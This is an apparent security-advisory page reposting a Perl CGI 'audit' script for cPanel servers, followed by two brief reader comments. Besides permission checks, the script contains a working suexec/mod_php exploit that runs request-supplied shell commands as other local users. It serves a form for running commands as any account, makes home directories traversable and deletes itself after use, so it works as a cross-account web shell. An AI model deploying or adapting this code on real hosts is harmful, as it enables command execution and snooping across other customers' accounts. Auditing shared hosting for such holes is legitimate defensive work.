Credit:
The information has been provided by Rob Brown.
The original article can be found at: http://www.a-squad.com/audit/
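A-Squad has built a simple-to-use Perl script that administrators can use to check whether their cPanel system is vulnerable at several points of attack. Besides reading file permissions, the script's later checks run a command on the host, and its last line deletes the script file once it is more than 0.01 days (roughly a quarter of an hour) old.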
Testing Script:
#!/usr/bin/perl -w
# PROGRAM: tests.pl
# AUTHORS: Rob Brown (rob@asquad.com)
# PURPOSE: Detect possible vulnerabilities
#
# DISCLAIMER:
# THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*.
# IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY.
# USE AT YOUR OWN RISK.
#
# For secure cpanel hosting, visit A-Squad.Com
use strict;
use CGI ':standard';
# Command-line convenience: a first argument is used as the query string, so
# the script can be run from a shell as if it had received a GET request.
if (my $query = shift @ARGV) {
    @ENV{qw(QUERY_STRING REQUEST_METHOD)} = ($query, "GET");
}

# Request object; the "command" and "username" parameters are read from it
# further down.
my $q = CGI->new;

# Unbuffered output, so each result line is sent as soon as it is printed.
$| = 1;

# State shared by the checks that follow.
my @users;                              # filled by the passwd scan
my $me              = "";               # account whose home contains $PWD
my $default_command = "id -a";          # used when no "command" parameter is given
my $dummy           = "/tmp/tests";     # scratch directory for the suexec test
my $action          = "cpanel.php";     # target of the follow-up form
my ($secure, $locked)          = (1, 1);    # cleared by failing checks
my ($common, $cpanel, $canexe) = (0, 0, 0); # set as conditions are detected

# Page header, banner, and the opening of the result list.
print start_html("System Check");
print qq{<center><a href=http://www.a-squad.com/><img src=http://www.a-squad.com/Abanner.jpg border=0 alt="ADVERTISEMENT: A-Squad Certified Secure cPanel Hosting"></a></center>\n};
print "<ol>Performing white box security audit...\n";
# Check 1: is cPanel present?  The version string returned by the cPanel
# binary doubles as the flag that gates the cPanel-specific tests later on.
# NOTE(review): if the directory exists but the binary prints nothing, $cpanel
# ends up false and those later tests are skipped even though this line
# reports PASSED.
if (-d "/usr/local/cpanel") {
    $cpanel = `/usr/local/cpanel/cpanel -V`;
    chomp $cpanel;
    print "<li><font color=green>PASSED</font>: cPanel INSTALLED ($cpanel)\n";
}
else {
    print "<li><font color=red>FAILED</font>: cPanel NOT INSTALLED\n",
          "<a href=http://www.a-squad.com/audit/explain1.html>Explain</a>\n";
}
# Check 2: which account does this CGI run as?  A real UID below 500 is taken
# to mean a system/shared account rather than a customer account.
# NOTE(review): 500 is hard-coded; the first regular UID differs between
# distributions (see UID_MIN in /etc/login.defs), so adjust it before relying
# on this result.
my $uid = $<;
if ($uid >= 500) {
    print "<li><font color=green>PASSED</font>: Privileged UID Vulnerability Check ($uid)\n";
}
else {
    print "<li><font color=red>FAILED</font>: Privileged UID Vulnerability Check ($uid)\n",
          "<a href=http://www.a-squad.com/audit/explain2.html>Explain</a>\n";

    # Running as "nobody" is the only case here that clears $secure.
    my $login = getpwuid $uid;
    if ($login ne "nobody") {
        print "<li><font color=green>PASSED</font>: User $login ($uid) is probably not shared\n";
    }
    else {
        print "<li><font color=red>FAILED</font>: nobody execution\n",
              "<a href=http://www.a-squad.com/audit/explain3.html>Explain</a>\n";
        $secure = 0;
    }

    # Remember that scripts run under a common low UID; later tests branch on it.
    $common = 1;
}
# Walk the password database: collect every account with UID >= 500 and work
# out which of them owns the directory this script is running from.
# NOTE(review): the owner is inferred from $ENV{PWD}, which comes from the
# environment; if it is unset the match never succeeds and $me stays empty.
setpwent;
while (my @entry = getpwent) {
    # Fields used: login name, UID and home directory.
    my ($name, $uid, $dir) = @entry[0, 2, 7];
    next if $uid < 500;

    push @users, $name;

    # The account whose home directory is a prefix of $PWD is treated as "me";
    # HOME is overwritten to match so the permission checks inspect that tree.
    next unless $ENV{PWD} =~ m%^\Q$dir\E/%;
    $me        = $name;
    $ENV{HOME} = $dir;
}
# Permission audit of the detected account's home tree.  It runs only when the
# passwd scan identified an owning account ($me) and $ENV{HOME} is a directory.
# The -d test also fills Perl's stat cache, which the first "stat _" below
# reuses, so the order of these statements matters.
if ($me && $ENV{HOME} &&
-d $ENV{HOME}) {
# Mode bits of $HOME, taken from the stat that -d just performed.
my $mode = (stat _)[2];
# Bit 1 is other-execute (o+x): other accounts can traverse into $HOME.
# Failing here also clears $locked, which the WEBROOT checks depend on.
if ($mode & 1) {
print "<li><font color=red>FAILED</font>: Stealth Snoop Vulnerability [$ENV{HOME}]\n";
print "<a href=http://www.a-squad.com/audit/explain4.html>Explain</a>\n";
$secure = 0;
$locked = 0;
} else {
print "<li><font color=green>PASSED</font>: Stealth Snoop Vulnerability [$ENV{HOME}]\n";
}
# Bit 4 is other-read (o+r): other accounts can list $HOME.
if ($mode & 4) {
print "<li><font color=red>FAILED</font>: Simple \$HOME Scanning [$ENV{HOME}]\n";
print "<a href=http://www.a-squad.com/audit/explain5.html>Explain</a>\n";
$secure = 0;
} else {
print "<li><font color=green>PASSED</font>: Simple \$HOME Scanning [$ENV{HOME}]\n";
}
# Bit 32 (octal 040) is group-read (g+r): members of the directory's group
# can list $HOME.
if ($mode & 32) {
print "<li><font color=red>FAILED</font>: Group \$HOME Scanning [$ENV{HOME}]\n";
print "<a href=http://www.a-squad.com/audit/explain6.html>Explain</a>\n";
$secure = 0;
} else {
print "<li><font color=green>PASSED</font>: Group \$HOME Scanning [$ENV{HOME}]\n";
}
# Same other-read test on the parent of $HOME: a listable parent exposes the
# names of the sibling home directories.
$mode = (stat "$ENV{HOME}/..")[2];
if ($mode & 4) {
print "<li><font color=red>FAILED</font>: Root /home scanning\n";
print "<a href=http://www.a-squad.com/audit/explain11.html>Explain</a>\n";
$secure = 0;
} else {
print "<li><font color=green>PASSED</font>: Root /home scanning\n";
}
# Web root: reported only when $HOME itself is traversable (!$locked) and
# public_html has other-execute set.
# NOTE(review): if public_html does not exist, stat returns an empty list,
# $mode and $pubg are undef, and both WEBROOT checks print PASSED.
# NOTE(review): unlike the other failures in this block, this one leaves
# $secure untouched - confirm that is intended.
$mode = (stat "$ENV{HOME}/public_html")[2];
if (!$locked && $mode & 1) {
print "<li><font color=red>FAILED</font>: Simple WEBROOT Protection\n";
print "<a href=http://www.a-squad.com/audit/explain7.html>Explain</a>\n";
} else {
print "<li><font color=green>PASSED</font>: Simple WEBROOT Protection\n";
}
# Group id of public_html, read from the stat cached by the call above.
my $pubg = (stat _)[5];
# Fails when scripts run under a common low UID ($common), $HOME is
# traversable, and public_html is reachable either through group-execute
# (bit 8) with a group equal to this process's real GID ($(), or through
# other-execute (bit 1).  "and" binds more loosely than "||", so the two
# reachability tests are grouped together.
if ($common && !$locked and
($(==$pubg && ($mode & 8)) ||
($mode & 1)) {
print "<li><font color=red>FAILED</font>: Real WEBROOT Protection\n";
print "<a href=http://www.a-squad.com/audit/explain8.html>Explain</a>\n";
$secure = 0;
} else {
print "<li><font color=green>PASSED</font>: Real WEBROOT Protection\n";
}
} else {
# No owning account was found, so none of the permission checks ran.
# NOTE(review): $secure is not cleared here, so the final verdict can still
# read as secure although this whole group was skipped.
print "<li><font color=red>FAILED</font>: Unable to locate unprivileged homedir\n";
}
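# Active execution tests.  Unlike the permission checks, these branches run a
# command on the host.  $command comes from the "command" request parameter
# (falling back to $default_command) and $who from "username" (falling back to
# the detected account), so whoever can reach this CGI chooses what is run.
# Deploy it only for the duration of a test and remove it afterwards.
my $command = $q->param("command") || $default_command;
my $who     = $q->param("username") || $me;

if ($cpanel && $common) {
    # cPanel is present and the CGI runs under a UID below 500.
    if ($command and $who) {
        # NOTE(review): /tmp/tests is a fixed name in a shared directory and
        # none of mkdir/chdir/symlink/open is checked; if the directory cannot
        # be created or entered, the file below is written into whatever the
        # current directory happens to be.
        mkdir $dummy, 0755;
        chdir $dummy;
        symlink("/usr/local/cpanel", "cpanel");
        my $dir = (getpwnam $who)[7];
        open(DUMMY, ">SafeFile.pm");
        $ENV{HOME} = $dir;
        print DUMMY qq{chdir "$dir";warn "\n";\nexec <<RUN$$;\n$command\nRUN$$\n};
        close DUMMY;

        # suexec is asked to run a cPanel helper as $who; stderr is captured
        # together with stdout.
        # NOTE(review): $who reaches the shell unvalidated; restricting it to
        # the names collected in @users would keep the test to real accounts.
        my $out = `/usr/local/apache/bin/suexec $who $who cpanel/bin/proftpdvhosts 2>&1`;

        # Leave and remove the scratch directory before reporting.
        chdir "/var/tmp";
        system("rm", "-rf", $dummy);

        # Any output at all is treated as evidence that the command ran.
        if ($out) {
            print "<li><font color=red><b>FAILED</b></font>: SUEXEC <code>mod_php</code> Exploit Test\n";
            print "<a href=http://www.a-squad.com/audit/explain9.html>Explain</a>\n";
            print "<pre>EXEC [$command] as [$who]:\n";
            # Escape & and < so the captured output is shown as text instead
            # of being interpreted as markup by the browser.
            $out =~ s/&/&amp;/g;
            $out =~ s/</&lt;/g;
            print $out, "</pre>\n";
            $canexe = 1;
            # Count this failure in the final verdict, as the mod_phpsuexec
            # branch below does; otherwise the summary could still say
            # "secure" after a failed execution test.
            $secure = 0;
        }
        else {
            print "<li><font color=green>PASSED</font>: SUEXEC <code>mod_php</code> Exploit Test\n";
        }
    }
}
elsif ($cpanel && !$common) {
    # cPanel is present and the CGI runs under a per-user UID (>= 500).
    # The probe runs the PHP binary against cPanel's phpinfo.php and looks for
    # the phpinfo() marker in what comes back.
    my $probe = `PATH_TRANSLATED=/usr/local/cpanel/base/phpinfo.php SCRIPT_FILENAME=/dev/null REQUEST_METHOD=GET /usr/bin/php 2>&1`;
    if ($probe =~ /phpinfo\(\)/) {
        print "<li><font color=red><b>FAILED</b></font>: SUEXEC <code>mod_phpsuexec</code> Exploit Test\n";
        print "<a href=http://www.a-squad.com/audit/explain10.html>Explain</a>\n";
        $canexe = 1;
        $secure = 0;
        print "<pre>EXEC [$command] as [$who]:\n";

        # The submitted command is run through the shell as the current account.
        my $out = `$command 2>&1`;
        # Escape & and < so the captured output is shown as text instead of
        # being interpreted as markup by the browser.
        $out =~ s/&/&amp;/g;
        $out =~ s/</&lt;/g;
        print $out, "</pre>\n";

        if ($who ne $me) {
            print "Submit again to switch to another user...<br>\n";
            # The follow-up form is pointed at a URL built from both account
            # names and one of the guessed script paths.
            my @guess = qw(/index.php /forum/index.php /forums/index.php);
            my $rand  = $guess[rand @guess];
            $action = "/~$who$rand/~$me/cpanel.php";
            # NOTE(review): this makes $HOME traversable by other accounts
            # (o+x) and never restores it - the same condition the "Stealth
            # Snoop" check reports as FAILED.  Reset the mode after testing.
            # List form keeps the path away from the shell.
            system("chmod", "o+x", $ENV{HOME});
        }
    }
    else {
        print "<li><font color=green>PASSED</font>: SUEXEC <code>mod_phpsuexec</code> Exploit Test\n";
    }
}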
# Overall verdict, printed only on hosts where cPanel was detected.
# NOTE(review): $secure is cleared by some FAILED results but not all of them,
# so a PASSED verdict means none of those particular checks tripped; read the
# individual lines above rather than this summary alone.
if ($cpanel) {
    my $verdict = $secure
        ? "<li><font color=green>PASSED</font>: Congratulations, your cPanel configuration is secure!\n"
        : "<li><font color=red>FAILED</font>: One or more insecure cPanel configurations were detected. Visit <a href=http://www.a-squad.com/>A-Squad.Com</a> for details on where to find more secure cPanel hosting.\n";
    print $verdict;
}

# Close the result list opened before the first check.
print "</ol>";
# The command form is offered only after one of the execution tests reported
# that a command could be run ($canexe).  It resubmits "username" and
# "command" by GET to $action.
if ($canexe) {
    print
        start_form(-method => "GET", -action => $action, -name => "f"),
        "Username: ",
        popup_menu(
            -name    => "username",
            -values  => [ sort @users ],
            -default => $who,
        ),
        br,
        "Password: (not required)", br,
        "Command: ",
        textfield(-name => "command", -value => $command),
        br,
        submit(-value => "Test Execution"),
        end_form,
        "\n<script>f.command.focus()</script>\n";
}

print end_html;

# Self-removal: -M gives the age of the script file in days at the time this
# run started; once it exceeds 0.01 days (about 14 minutes) the script deletes
# itself.  This only happens when the script is requested again after that
# age, so a copy that is never requested again stays on disk - remove it by
# hand when testing is finished.
unlink $0 if -M $0 > 0.01;
|
| Subject:
|
errm, doh |
Date: |
9 Oct. 2006 |
| From: |
dohdohland.com |
| -M$0>0.01&&unlink$0; |
|
| Subject:
|
Brilliant |
Date: |
18 Jan. 2007 |
| From: |
f0rg3 |
| Thanks for the c0d3...much much learning you have spawned |